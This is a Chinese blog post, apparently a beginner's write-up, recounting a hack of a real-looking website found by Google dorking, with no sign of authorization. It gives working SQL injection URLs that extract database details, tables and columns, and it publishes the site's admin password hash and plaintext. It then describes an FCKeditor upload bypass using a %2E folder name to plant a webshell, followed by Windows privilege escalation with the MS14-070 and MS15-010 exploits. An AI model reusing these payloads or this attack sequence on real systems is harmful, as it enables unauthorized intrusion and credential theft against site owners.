正文 首页渗透测试

基础手工注入学习(注入+getshell+提权)

toobug

 开门见山, 玩了两年多,到现在不会手注(脚本狗,工具狗),各位表哥不要笑话。 最近想学一下,看了习科的SQL注入的那本电子书,google了一个垃圾站。   注入篇:

1st. 找注入
Inurl:php id =

 就7条结果,挨个试了一下,都是注入。 2nd.注入 基本的还是会一点的。   Order by = 5  显示位为 3 和 4 http://www.kavsec.com/text.php?id=-33 union select 1,2,3,4,5 from mysql.user

1.判断数据库版本及服务信息
                  首先学了concat()学了函数的使用
Concat()联合数据。和联合函数union不同,union用于联合两条SQL语句,这个用于联合两条数据结果。通常是联合两个字段名,在错误回注入法中,这个函数会联合更复杂的,以后会讲。数据库中管理员通常有登录名和密码等多个字段,用concat轻松一次注入出来。例如concat(username,0x3a,password),不同字段用逗号,隔开,中间加一个hex编码值。冒号进行hex编码(不知道这个编码的自己Google)得到0x3a,放在concat里面注入以后就显示冒号(自己试验),常用的有0x3a,0x5c,0x5f,0x3c62723e等
放到这个站上,自己把语句整理一下
http://www.kavsec.com/text.php?id=-33 union select 1,2,concat(0x64617461626173653A,database(),0x5c,0x757365723A,user(),0x5c,0x7665723A,version()),4,5 from mysql.user

database:daili\user:root@localhost\ver:5.5.20 哎呦?Root权限,不错哦~

2.爆库
然后下面又学了一个group_concat()函数的使用
group_concat()用法与上面类似,通常格式如下:group_concat(DISTINCT+user,0x3a,password),group_concat顾名思义,如果管理员账号不止一个的话,concat一次只能注入出来一个,进行依次注入显然太慢,于是使用group_concat把多条数据一次注入出来。DISTINCT我就不赘言了,你自己试验一下或者Google一下就行,很简单。
再放到这个站语句:
http://www.kavsec.com/text.php?id=-33 union select 1,2,concat(0x616C6C207461626C65733A,GROUP_CONCAT(DISTINCT+table_schema)),4,5 from information_schema.columns

3.爆表
http://www.kavsec.com/text.php?id=-33 union select 1,2,3,table_name,5 from (select * from information_schema.tables where table_schema=database() order by table_schema limit 1,1)t limit 1--

 4.爆字段 http://www.kavsec.com/text.php?id=-33 union select 1,2,3,column_name,5 from (select+*+from+information_schema.columns+where+table_name=0x61646D696E(表名hex) and table_schema=database() order by 1 limit 0,1)t limit 1--

 后面就简单了, 管理员数据就是admin:3e2f2ce2a16e73b8187548100fc31a3b(gujingming)   以上注入参考文章: 《手工注入php+MySQL参数,技巧和描述》《php+MySql注入非暴力爆数据库表段》《php+MySql注入非暴力爆字段名》《php+MySQL group_concat函数应用(php+MySql高级注入中国龙芯cpu公司网站语句应用一则)》     Getshell篇:

 进了后台,翻了翻,很简单,就一个Fck 

 各种Fck拿shell姿势,试了一遍,都不行。(表弟姿势少,等发达了,去日本学习下) 1.二次上传        X 2.FCK突破建立文件夹          X 3.Burp截断  X 4.FCK构造页面上传  X 然后自己想思路 建立1.php的文件夹,会被执行成1_php,1.php.gif的图会重命名为1_php.gif 那如果吧“.”写成URL的格式呢? 想一下把.写成%2E,能不能行呢? 然后新建了一个文件夹,名称写1%2Ephp 吼吼,果真成功~然后传了一张GIF马子

然后菜刀连接一下,马子就安静地躺在那了。
说实话,以前还真没遇到过这样的情况。头一次。不知道各位表哥有没有遇到过。
提权篇:
Shell在手,天下我有~aspx支持~
D:\RECYCLER\目录有权限
64位2003
首先就试了一下,MS14-070
执行之后半天没有反应,然后更新了一下缓存

 然后打开站点看一下,

各位表哥知道原因吗?
表弟统共没提权几次,这次又遇到了这样的情况。不知道怎么解决了。
然后就等,大概等了有20分钟左右,可以打开了。
这次可不敢再用那个exp了。
求助基友了,把shell丢给基友看了下。
基友果断说:MS15-010
“之前法客开着的时候,就听说他是提权帝,今天一看,果真。。。”
后面紧跟一局:单子站什么的自觉发红包
。。。
我是学习的,手注都不会,接毛单。
然后屁颠屁颠去找exp
传上去执行,还是半天没回显,以为又要出事。赶紧打开站看一下,没死~
再回菜刀看一下~whoami

 我知道这篇文章很垃圾,但是求各位表哥不要打脸。

本文标题:基础手工注入学习(注入+getshell+提权)
本文链接:https://www.toobug.cn/post/12.html
作者授权:除特别说明外,本文由 toobug 原创编译并授权 TOOBUG信息安全网 刊载发布。
版权声明:本文不使用任何协议授权,您可以任何形式自由转载或使用。

用TOOBUG官方小程序阅览更加简洁
-- 展开阅读全文 --